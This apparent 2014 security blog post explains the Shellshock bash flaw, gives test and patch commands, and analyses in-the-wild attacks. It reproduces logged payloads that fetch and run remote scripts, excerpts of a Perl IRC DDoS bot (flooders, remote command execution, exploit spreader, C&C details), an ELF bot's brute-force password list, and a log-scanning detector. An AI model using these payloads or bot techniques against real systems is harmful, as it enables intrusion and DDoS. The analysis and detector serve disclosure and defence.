Update [26-09-2014]: If I get some time over the weekend, I’ll provide a follow-up post with a full analysis of the ELF binary. Already, I’ve seen additional requests to my box (and public reports) of PE binaries being downloaded as final payloads. Additionally, reports have also surfaced of a botnet dubbed “Wopbot”, spreading via Shellshock, which is being used to target the US DoD.
Just two days ago, on September 24, Stephane Chazelas discovered a bash vulnerability, CVE-2014-6271, which he disclosed on seclists (http://seclists.org/oss-sec/2014/q3/649). In his post, he briefly describes a bug he identified in the way bash handles environment variables passed in through server-side scripts (CGI, Python, Perl, etc.), which can lead to arbitrary code execution. Other network services are also potential vectors for this attack: ssh, dhclient, sudo, firefox, postfix and so on, all of which can lead to arbitrary command execution on a remote server.
Update [26-09-2014]: The original patch released for CVE-2014-6271 was incomplete. Tavis Ormandy posted a bypass of the patch on Twitter:
The bash patch seems incomplete to me, function parsing is still brittle. e.g. $ env X='() { (a)=>\' sh -c "echo date"; cat echo
— Tavis Ormandy (@taviso) September 24, 2014
This was allocated CVE-2014-7169 and has since been patched. Don’t forget to update again, people!
Please see this StackExchange post for a good explanation on the vulnerable code in bash.
Are you vulnerable?
Interestingly enough, this bug affects bash versions up to 4.2 (that’s 25 years this vulnerability has existed).
To test if you’re vulnerable, open a terminal and execute the following command:
CVE-2014-6271
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
or
CVE-2014-7169
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
In the above example for CVE-2014-6271, an environment variable ‘x’ is created whose value is a minimal function definition ‘() { :;}’. Due to the bug in bash, the shell also executes the code that follows the function body when it imports the variable. Running this on a vulnerable version of bash will print the following:
vulnerable
this is a test
If you execute the same command on a version of bash which has been patched, you should see the following error:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
In a similar fashion, the PoC for CVE-2014-7169 should print the date if vulnerable.
Update Bash
In order to mitigate this issue, update bash ASAP. This can be done through your standard distro package management tools such as apt-get, yum etc.
$ sudo apt-get update && sudo apt-get install --only-upgrade bash
or
$ sudo yum update bash
Attacks ITW
Already, I’ve begun to receive requests to some of my boxes attempting to exploit this vulnerability.
80 209.126.230.72 - - [24/Sep/2014:23:40:04 +0200] "GET / HTTP/1.0" 200 324 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
80 209.126.230.72 - - [25/Sep/2014:09:27:53 +0200] "GET / HTTP/1.0" 200 324 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
80 213.5.67.223 - - [25/Sep/2014:15:44:44 +0200] "GET /cgi-bin/his HTTP/1.0" 404 491 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
In the above, the first two log entries are from an internet-wide scan being conducted by Erratasec, who are currently scanning every IPv4 address to get an idea of how many vulnerable services are out there. Obviously, other, malicious attackers are performing the same scan. The last entry is the most interesting: it is an actual attempt to exploit this vulnerability in order to download and run a file called ‘jur’.
/bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""
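As an added example (not code from the original post), here is a small Python scanner that parses access-log lines like those above and pulls the injected command out of the request, Referer and User-Agent fields. The sample lines are my own constructions using RFC 5737 addresses, and the triage labels in classify() are my own heuristic.

```python
import re

# Apache combined log format, optionally prefixed by the listening port as in
# the excerpts above. Quoted fields may contain \" escapes (third entry), so a
# plain [^"]* would cut the User-Agent short.
LOG_RE = re.compile(
    r'^(?:\d+\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Trigger: an empty function "() { ... };" at the start of a header value,
# followed by the command bash executes. "[\s.]*" also accepts the dotted
# form ":().{.:;.};" seen in some log exports.
PAYLOAD_RE = re.compile(r'\(\s*\)[\s.]*\{[^}]*\}\s*;(?P<cmd>.*)')
# Constructed sample lines modelled on the excerpts above (RFC 5737 addresses).
SAMPLE_LOG = [
    '80 192.0.2.10 - - [24/Sep/2014:23:40:04 +0200] "GET / HTTP/1.0" 200 324 '
    '"() { :; }; ping -c 11 198.51.100.7" "shellshock-scan (http://example.invalid/)"',
    '80 192.0.2.11 - - [25/Sep/2014:15:44:44 +0200] "GET /cgi-bin/his HTTP/1.0" 404 491 '
    '"-" "() { :;}; /bin/bash -c \\"cd /tmp;curl -O http://192.0.2.11/jur ; perl /tmp/jur\\""',
    '80 192.0.2.12 - - [25/Sep/2014:16:01:09 +0200] "GET /index.html HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0"',
]

def extract_payload(value):
    """Return the command injected after the fake function, or None if clean."""
    m = PAYLOAD_RE.search(value)
    return m.group('cmd').strip(' .').replace('\\"', '"') if m else None

def classify(cmd):
    """Coarse triage of the injected command (heuristic labels of my own)."""
    if re.search(r'\b(curl|wget)\b', cmd):
        return 'download-and-execute'
    return 'scanner-callback' if re.search(r'\bping\b', cmd) else 'other'

def inspect(line):
    """Return a hit record if any header field carries a payload, else None."""
    rec = LOG_RE.match(line.strip())
    if rec is None:
        return None
    for field in ('request', 'referer', 'agent'):
        cmd = extract_payload(rec.group(field))
        if cmd is not None:
            return {'ip': rec.group('ip'), 'field': field,
                    'payload': cmd, 'kind': classify(cmd)}
    return None

def scan_log(lines):
    return [hit for hit in map(inspect, lines) if hit]
```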
Jur Binary
Downloading the binary we have the following file:
$ md5sum jur
0763b8c00d6862d2d0f8f980de065857 jur
$ file jur
jur: a /usr/bin/perl script text executable
The file itself is a Perl script which acts as an IRC bot used to perform DDoS attacks. The bot connects to ‘185.31.209.84:443’ using a random nickname.
my @adms=("JB","x");
my @hostauth=("fuckoff","localhost");
my @canais=("#new");
chop (my $realname = 'vn');
$servidor='185.31.209.84' unless $servidor;
my $porta='443';
..
#$servidor="$ARGV[0]" if $ARGV[0];
Next, it connects to the IRC server:
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sendraw("PASS swedenrocks");
It joins a key protected channel #new using the key ‘ddosit’ as per the following:
sendraw("JOIN $canal ddosit");
Port Scanning:
if ($funcarg =~ /^portscan (.*)/) {
    my $hostip="$1";
    my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
    my (@aberta, %porta_banner);
    sendraw($IRC_cur_socket, "PRIVMSG $printl :02[SCAN]02 Scanning ".$1." for open ports.");
    ..
    if (@aberta) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :02[SCAN]02 Open port(s): @aberta");
    } else {
        sendraw($IRC_cur_socket,"PRIVMSG $printl :02[SCAN]02 No open ports found");
    }
- DDoS Attacks
- TCP Flooder
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[TCP]02 Attacking ".$1.":".$2." for ".$3." seconds.");
..
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[TCP]02 Attack done ".$1.":".$2.".");
}
In a similar fashion to the TCP Flooder above it also performs DDoS using HTTP and UDP.
Scans for unpatched INDEXU:
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[GOOGLE]02 Scanning for unpatched INDEXU for ".$1." seconds.");
..
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
..
sendraw($IRC_cur_socket, "PRIVMSG $printl :02[GOOGLE]02 Exploited ".$exploited." boxes in ".$1."
It also gives the attacker the ability to run arbitrary commands on the host and prints the results to the IRC channel:
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
Spreader
Finally, it includes a spreading mechanism by searching Google:
foreach $dom (@dominios)
{
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
}
Nginx Binary
There have also been reports of the following exploit attempts identified ITW:
:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh
The above binary was retrievable:
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
Quick Notes
Looking at the sample quickly, we have the following:
Embedded IPs
108.162.197.26
89.238.150.154:5
The first IP is associated with Cloudflare and has since been neutralised. It is believed this was used to obtain the IP of the infected machine. The second is the hard-coded C&C. In my testing the C&C is no longer responding. However, I did stumble across some additional information about this binary, whereby someone managed to capture traffic when it was live:
https://news.ycombinator.com/item?id=8366088
sent >>> BUILD X86
recv >>> !* HTTP
recv >>> 190.93.240.15,190.93.241.15,141.101.112.16,190.93.243.15,190.93.242.15 pastebin.com /4HQ2w4AZ 80 2
recv >>> PING
sent >>> PONG
Looking at the binary itself, we can see it tests the machine it has gained access to. This may be done to identify honeypot-type machines, or to identify whether the machine itself is a router running busybox:
/bin/busybox;echo -e '\147\141\171\146\147\164'
Standard shell interpreters won’t convert the octal to ASCII. However, busybox does:
$ echo -e '\147\141\171\146\147\164'
\147\141\171\146\147\164
$ busybox echo -e '\147\141\171\146\147\164'
gayfgt
The commands supported by the bot are as follows:
PING
PONG!
GETLOCALIP
SCANNER
ON
HOLD - DDoS - Hold Flooding
JUNK - DDoS - Junk Flooding
UDP - DDoS - UDP Flooding
TCP - DDoS - TCP Flooding
KILLATTK
LOLNOGTFO
DUP
SH
It also contains the following password list for simple brute-forcing:
.rodata:080AD157 00000005 C root
.rodata:080AD15F 00000006 C admin
.rodata:080AD166 00000005 C user
.rodata:080AD16C 00000006 C login
.rodata:080AD173 00000006 C guest
.rodata:080AD17A 00000005 C toor
.rodata:080AD180 00000009 C changeme
.rodata:080AD18A 00000005 C 1234
.rodata:080AD190 00000006 C 12345
.rodata:080AD197 00000007 C 123456
.rodata:080AD19F 00000008 C default
.rodata:080AD1A8 00000005 C pass
.rodata:080AD1AE 00000009 C password
This is a similar IRC bot to the Perl script identified above.
Additional Info:
This ELF sample has been floating around since at least March:
At that time, it used the following C&C:
162.219.57.16:2000